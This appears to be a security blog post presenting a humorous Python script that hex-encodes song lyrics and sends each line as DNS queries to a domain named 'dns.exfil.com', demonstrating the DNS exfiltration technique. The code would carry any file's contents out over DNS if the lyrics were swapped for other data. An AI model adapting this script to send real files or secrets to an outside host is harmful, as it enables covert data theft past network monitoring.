DNS Rickroll – Trolling Sysadmins to Ring in the New Year!

I wanted to release something lighter around the holidays, so I present my DNS Rickroll python script!

As you know, DNS is for data exfiltration, tunneling, and general malfeasance. In the spirit of the holidays, I've decided to release a slightly different tool utilizing DNS.

DNS Rickroll takes a lyrics file (currently this), converts it to ASCII hex, and sends a DNS request to the specified domain.

Code

To start, all the script needs is Python, dnspython, and a lyrics.txt file (included). Additionally, you can add a domain where you can verify results and a healthy sense of humor.

You can find the current code for DNSRickroll below.

import dns.resolver
import urllib

myResolver = dns.resolver.Resolver()
domain = "dns.exfil.com"

with open('lyrics.txt') as f:
    content = f.readlines()
    content = [x.strip() for x in content] 

for line in content:
    hex = ''.join("{:02x}".format(ord(c)) for c in line)
    #print hex
    #print len(hex)

    query = myResolver.query(hex + "." + domain, "A")

Execution

And here you can see the requests in action!

DNS Rickroll - Execution

While this tool is definitely for fun, I could also see it being used to double encode information in lyrics, etc. Alternatively, the script could arrange the order of lyrics as another form of obfuscation and encoding.

Conclusion

Some of my next steps will be to add more lyrics and automatically shorten the lines (I manually edited this lyrics file). Additionally, I may add support for a URL where it can verify its own results.

Finally, you can find the code and updates in my GitHub repository.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.